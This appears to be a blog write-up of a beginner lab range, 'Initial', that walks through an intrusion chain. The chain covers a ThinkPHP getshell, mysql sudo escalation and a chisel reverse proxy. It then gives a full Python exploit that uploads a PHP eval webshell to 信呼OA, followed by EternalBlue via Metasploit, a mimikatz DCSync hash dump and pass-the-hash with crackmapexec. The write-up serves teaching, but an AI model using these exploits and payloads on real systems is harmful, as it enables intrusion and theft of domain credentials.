[ 春秋云境 ] Initial 仿真场景

文章目录

靶标介绍:

Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。

外网

打开给的网址, 有一个登录框

用fscan扫描一下可以发现存在两个端口, 80和22
80端口的网站是thinkphp的框架, 用工具扫一下getshell
上蚁剑连一下

可以发现当前的权限是 www-data

肯定是需要提权的
sudo -l

可以发现存在一个root权限并且没有密码的mysql

利用mysql进行提权 sudo mysql -e '\! whoami'

拿到第一个flag

复制代码
flag01:  flag{60b53231-

给了我们一个提示

the next flag may be in a server in the internal network.

可以看到它的内网网段

172.22.1.0/24

将fscan上传上去, 进行扫描

内网基本信息

复制代码
172.22.1.2 DC域控

172.22.1.21 存在MS17-010永恒之蓝

172.22.1.18 信呼OA系统

内网

使用chisel建立socks5代理, 以使本地能够访问到内网资源

chisel服务端 (vps)

复制代码
./chisel server -p 6666 --reverse

首先,服务器端监听6666端口,然后使用reverse参数,reverse表示的是服务端使用反向模式,也就是流量转到哪个端口由客户端直接指定的

客户端(受控主机)

复制代码
./chisel client vps:6666 R:0.0.0.0:9383:socks

将受控主机作为client,然后连接vps:6666,把所有流量通过vps:6666进行转发,然后把vps:9383端口作为socks5代理

运行完之后就可以在本地电脑进行socks5代理, 连接 vps:9383 实现对内网资源的访问

使用proxifier进行代理

然后就可以直接用浏览器访问内网地址了

信呼oa

这个版本信呼OA存在后台的漏洞

复制代码
https://blog.51cto.com/u_15847702/5827475

弱口令 admin / admin123可以登录进去

poc脚本

再在同一目录下建一个1.php

<?=eval($_POST[1]);?>

python 复制代码
import requests


session = requests.session()

url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}


r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
print(id)
print(filepath)
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

运行后会有一个路由打印处理 /upload/2025-03/29_15374987.php

访问这个路由, 用蚁剑连接

可以拿到flag2

复制代码
flag02: 2ce3-4813-87d4-

永恒之蓝

然后就是内网的另外一台主机了, 存在永恒之蓝的漏洞, 直接msf打

不过要先配一下代理

复制代码
sudo vim /etc/proxychains4.conf

然后就进入msf打永恒之蓝

复制代码
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

可以看到拿到了一个shell

hash传递

抓取用户的hash

shell 复制代码
load kiwi  #加载 Kiwi 模块
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

# kiwi_cmd  执行mimikatz的命令,后面接mimikatz.exe的命令
# lsadump::dcsync → 执行 DCSync 攻击,从域控制器拉取凭据信息。
# /domain:xiaorang.lab → 目标 Active Directory 域名是 xiaorang.lab。
# /all → 获取 域内所有用户 的凭据数据(包括 NTLM Hash、Kerberos Key)。
# /csv → 以 CSV 格式 输出数据,方便导出分析。
# exit 退出当前会话

抓取到了Administrator用户的hash

使用crackmapexec打hash传递

shell 复制代码
proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

# crackmapexec smb:使用 SMB 协议 进行攻击(通常用于 Windows 文件共享和远程命令执行)
# -H <hash>:使用 NTLM 哈希认证(Pass-the-Hash 攻击)
# -d 指定AD域名
# -x 远程执行Windows cmd命令
复制代码
flag03: e8f88d0d43d6}

浪费了很多时间在代理上面, 不知道为什么前面一直连不上

参考文章:

复制代码
https://fushuling.com/index.php/2023/08/27/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83%C2%B7initial/
相关推荐
starstarzz14 天前
解决idea无法正常加载lombok包
java·ide·spring·intellij-idea·springboot·web
码农不惑14 天前
Rust使用tokio(二)HTTPS相关
https·rust·web·openssl
Zik----17 天前
Spring Boot 管理系统项目解读
spring boot·web
終不似少年遊*17 天前
【软测】接口测试 - 用postman测试软件登录模块
软件测试·测试工具·json·postman·web·可用性测试
kali-Myon17 天前
攻防世界[level7]-Web_php_wrong_nginx_config
前端·nginx·安全·php·web·ctf·攻防世界
pixle018 天前
前端 EventSource(SSE)实时通信使用指南(EventSource-polyfill)
前端·web·sse·eventsource·polyfill
Java永无止境19 天前
Web后端基础:数据库
java·数据库·javaweb·web
終不似少年遊*20 天前
【软测】node.js辅助生成测试报告
软件测试·测试工具·node.js·postman·web
SamHou020 天前
手把手 Flexbox——从零开始的奶奶级 Web 开发教程3
前端·css·web
jinzong5320 天前
服务器快速搭建WebDAV/Venera开源漫画实现跨设备同步
web·webdav